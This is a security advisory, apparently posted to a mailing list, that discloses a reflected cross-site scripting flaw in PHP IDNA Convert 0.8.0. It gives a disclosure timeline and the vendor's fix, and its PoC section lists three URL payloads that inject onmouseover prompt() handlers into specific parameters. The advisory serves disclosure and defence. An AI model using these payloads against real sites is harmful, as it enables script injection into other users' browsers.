[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[IBliss Security Advisory] Cross-site scripting ( XSS ) in PHP IDNA Convert



[ PHP IDNA Convert Cross-site scripting ( XSS ) ]

[ Vendor product description]

PHP Net_IDNA is a class to convert between the Punycode and Unicode
formats. Punycode is a standard described in RFC 3492 and part of IDNA
(Internationalizing Domain Names in Applications [RFC3490]) . This class
allows PHP scripts to convert these domain names without having one of
the PHP extensions installed. It supports both IDNA 2003 and IDNA 2008.

[ Bug Description ]

Cross-site scripting (XSS) vulnerability in parameters encoded/decoded
in the class PHP IDNA Convert allows remote attackers to inject
arbitrary web script or HTML.

[ History ]

Advisory sent to vendor on 09/24/2013
Vendor reply on 09/25/2013
Vulnerability fixed on 09/26/2013

[ Impact ]

HIGH

[ Afected Version ]

0.8.0

[ Vendor Reply ]

Yes. Version 0.8.1 released

[ CVE Reference ]



[ PoC ]

Payloads:

http://[host]/idna_convert/index.php?decoded=94102%22%20onmouseover%3dprompt(929882)%20bad%3d%22&encode=Encode%20>>&idn_version=2003

http://[host]/idna_convert/example.php?decode=<<%20Decode&encoded=94102%22%20onmouseover%3dprompt(938200)%20bad%3d%22

http://[host]/index.php/%22onmouseover%3d%27prompt%28976724%29%27bad%3d%22%3E

[ References ]

[1] PHP IDNA Convert - http://phlymail.com/en/downloads/idna-convert.html

[2] Owasp Cross-site scripting -
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/

--------------------------------------------
iBliss Segurança e Inteligência - Sponsor: Alexandro Silva - Alexos

alexos (at) ibliss.com (dot) br [email concealed]